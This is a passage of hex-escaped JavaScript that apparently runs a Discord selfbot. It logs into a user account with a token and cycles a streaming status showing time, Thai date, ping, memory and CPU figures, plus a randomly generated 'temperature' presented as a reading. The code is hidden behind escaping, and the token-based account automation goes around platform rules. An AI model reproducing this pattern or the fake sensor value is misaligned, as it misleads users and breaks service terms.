x20\x27มกราคม\x27;\x0a\x20\x20\x20\x20const\x20yearr\x20=\x20datee.getFullYear().toString().replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20return\x20`${dayy}/${customMonthNamee}/${yearr}`;\x0a}\x0a\x0afunction\x20getRAMInfo()\x20{\x0a\x20\x20\x20\x20const\x20freeMemory\x20=\x20os.freemem();\x0a\x20\x20\x20\x20return\x20`${formatBytes(freeMemory)}`;\x0a}\x0a\x0afunction\x20getRSSInfo(memoryUsage)\x20{\x0a\x20\x20\x20\x20const\x20formattedMemoryUsage\x20=\x20formatMemoryUsage(memoryUsage);\x0a\x20\x20\x20\x20return\x20`${formattedMemoryUsage.rss}`;\x0a}\x0a\x0afunction\x20getHeapUsedInfo(memoryUsage)\x20{\x0a\x20\x20\x20\x20const\x20formattedMemoryUsage\x20=\x20formatMemoryUsage(memoryUsage);\x0a\x20\x20\x20\x20return\x20`${formattedMemoryUsage.heapUsed}`;\x0a}\x0a\x0afunction\x20formatBytes(bytes,\x20decimals\x20=\x202)\x20{\x0a\x20\x20\x20\x20if\x20(bytes\x20===\x200)\x20return\x20\x220\x20Bytes\x22;\x0a\x20\x20\x20\x20const\x20k\x20=\x201024;\x0a\x20\x20\x20\x20const\x20dm\x20=\x20decimals\x20<\x200\x20?\x200\x20:\x20decimals;\x0a\x20\x20\x20\x20const\x20sizes\x20=\x20[\x22Bytes\x22,\x20\x22\x22,\x20\x22\x22,\x20\x22\x22,\x20\x22\x22,\x20\x22\x22,\x20\x22\x22,\x20\x22\x22,\x20\x22\x22];\x0a\x20\x20\x20\x20const\x20i\x20=\x20Math.floor(Math.log(bytes)\x20/\x20Math.log(k));\x0a\x20\x20\x20\x20return\x20parseFloat((bytes\x20/\x20Math.pow(k,\x20i)).toFixed(dm))\x20+\x20\x22\x20\x22\x20+\x20sizes[i];\x0a}\x0a\x0afunction\x20formatMemoryUsage(memoryUsage)\x20{\x0a\x20\x20\x20\x20return\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20rss:\x20`${(memoryUsage.rss\x20/\x201024\x20/\x201024).toFixed(2)}\x20`,\x0a\x20\x20\x20\x20\x20\x20\x20\x20heapTotal:\x20`${(memoryUsage.heapTotal\x20/\x201024\x20/\x201024).toFixed(2)}\x20`,\x0a\x20\x20\x20\x20\x20\x20\x20\x20heapUsed:\x20`${(memoryUsage.heapUsed\x20/\x201024\x20/\x201024).toFixed(2)}\x20`,\x0a\x20\x20\x20\x20\x20\x20\x20\x20external:\x20`${(memoryUsage.external\x20/\x201024\x20/\x201024).toFixed(2)}\x20`,\x0a\x20\x20\x20\x20};\x0a}\x0a\x0a\x0a\x0afunction\x20getCPUInfo()\x20{\x0a\x20\x20\x20\x20const\x20cpus\x20=\x20os.cpus();\x0a\x20\x20\x20\x20return\x20`${cpus.length}`;\x0a}\x0a\x0afunction\x20getTemperature()\x20{\x0a\x20\x20\x20\x20const\x20center\x20=\x2025;\x0a\x20\x20\x20\x20const\x20variance\x20=\x205;\x0a\x20\x20\x20\x20const\x20temperature\x20=\x20center\x20+\x20(Math.random()\x20*\x20variance\x20*\x202\x20-\x20variance);\x0a\x20\x20\x20\x20return\x20`${temperature.toFixed(1)}`;\x0a}\x0a\x0a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20function\x20getPing()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20ping\x20=\x20Math.round(this.medmwng.ws.ping);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20`${ping}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20class\x20MyClient\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20constructor(userConfig)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.userConfig\x20=\x20userConfig;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.index\x20=\x200;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.initClient();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20initClient()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng\x20=\x20new\x20Discord.Client({\x20readyStatus:\x20false,\x20checkUpdate:\x20false\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.once(\x27ready\x27,\x20()\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.log(`Logged\x20in\x20as\x20${this.medmwng.user.tag}`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.updateStatus();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.statusInterval\x20=\x20setInterval(()\x20=>\x20this.updateStatus(),\x204000);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20console_error\x20=\x20`โทเค็นผู้ใช้งานที่\x20ApplicationId\x20หมายเลข\x20:\x20${this.userConfig.applicationId}\x20ไม่ถูกต้อง!`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.login(this.userConfig.token)\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.catch(error\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(console_error);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.handleError(error);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20handleError(error)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(error.message.includes(\x27TOKEN_INVALID\x27)\x20||\x20error.message.includes(\x27DISALLOWED_INTENTS\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(`Error\x20for\x20ApplicationId\x20${this.userConfig.applicationId}:\x20${error.message}`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(`Unexpected\x20error\x20for\x20ApplicationId\x20${this.userConfig.applicationId}:\x20${error.message}`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20async\x20updateStatus()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20try\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20function\x20replacePlaceholders(text,\x20replacements)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20for\x20(const\x20key\x20in\x20replacements)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20text\x20=\x20text.replace(new\x20RegExp(key,\x20\x27i\x27),\x20replacements[key]);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20text;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20memoryUsage\x20=\x20process.memoryUsage();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20ping\x20=\x20getPing.call(this);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20temperature\x20=\x20getTemperature();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20rssText\x20=\x20getRSSInfo(memoryUsage);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20HeapText\x20=\x20getHeapUsedInfo(memoryUsage);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20ramText\x20=\x20getRAMInfo();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20cpuText\x20=\x20getCPUInfo();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20Time\x20=\x20`${getCurrentTime()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20Date\x20=\x20`${getCurrentDay()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20Datee\x20=\x20`${getCurrentDayy()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20richPresence\x20=\x20new\x20Discord.RichPresence(this.medmwng)\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setType(\x27STREAMING\x27)\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setApplicationId(this.userConfig.applicationId);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20detailReplacements\x20=\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27time\x27:\x20Time,\x20\x27date\x27:\x20Date,\x20\x27thaid\x27:\x20Datee,\x20\x27ping\x27:\x20ping,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27temp\x27:\x20temperature,\x20\x27rss\x27:\x20rssText,\x20\x27heap\x27:\x20HeapText,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27ram\x27:\x20ramText,\x20\x27cpu\x27:\x20cpuText\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20};\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20details\x20=\x20this.userConfig.Details[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20details\x20=\x20replacePlaceholders(details,\x20detailReplacements);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!details.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setDetails(details);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20LargeText\x20=\x20this.userConfig.LargeText[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20LargeText\x20=\x20replacePlaceholders(LargeText,\x20detailReplacements);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!LargeText.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setAssetsLargeText(LargeText);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20setState\x20=\x20this.userConfig.setState[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20setState\x20=\x20replacePlaceholders(setState,\x20detailReplacements);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!setState.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setState(setState);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20smallImageLink\x20=\x20this.userConfig.smallImageLinks[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20largeImageLink\x20=\x20this.userConfig.largeImageLinks[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(isValidUrl(smallImageLink))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setAssetsSmallImage(smallImageLink);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20if\x20(smallImageLink\x20&&\x20!smallImageLink.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20smallImageAsset\x20=\x20await\x20Util.getAssets(this.userConfig.applicationId,\x20smallImageLink);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(smallImageAsset)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setAssetsSmallImage(smallImageAsset.id);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(isValidUrl(largeImageLink))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setAssetsLargeImage(largeImageLink);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20if\x20(largeImageLink\x20&&\x20!largeImageLink.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20largeImageAsset\x20=\x20await\x20Util.getAssets(this.userConfig.applicationId,\x20largeImageLink);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(largeImageAsset)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setAssetsLargeImage(largeImageAsset.id);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setName(details)\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setURL(this.userConfig.setURL[0])\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setStartTimestamp(Date_Time);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(isValidUrl(this.userConfig.link1))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.addButton(this.userConfig.button1,\x20this.userConfig.link1);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(isValidUrl(this.userConfig.link2))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.addButton(this.userConfig.button2,\x20this.userConfig.link2);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.user.setActivity(richPresence);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.index\x20=\x20(this.index\x20+\x201)\x20%\x20this.userConfig.largeImageLinks.length;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20catch\x20(error)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(\x27เกิดข้อผิดพลาดในการอัปเดตสถานะ:\x27,\x20error.message);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20updateConfig(newConfig)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.userConfig\x20=\x20newConfig;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.index\x20=\x200;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20clearInterval(this.statusInterval);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.updateStatus();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.statusInterval\x20=\x20setInterval(()\x20=>\x20this.updateStatus(),\x204000);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20stop()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20clearInterval(this.statusInterval);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(this.medmwng.user)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.user.setActivity(null);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.destroy();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20isValidUrl\x20=\x20url\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20try\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20new\x20URL(url);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20true;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20catch\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20false;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20};\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20clients\x20=\x20config.user.map(userConfig\x20=>\x20new\x20MyClient(userConfig));\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20updateClients\x20=\x20newConfig\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20newClientIds\x20=\x20newConfig.user.map(user\x20=>\x20user.applicationId);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20currentClientIds\x20=\x20clients.map(client\x20=>\x20client.userConfig.applicationId);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20clients.forEach(client\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!newClientIds.includes(client.userConfig.applicationId))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20client.stop();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.log(`ผู้ใช้งาน\x20ApplicationId\x20หมายเลข\x20:\x2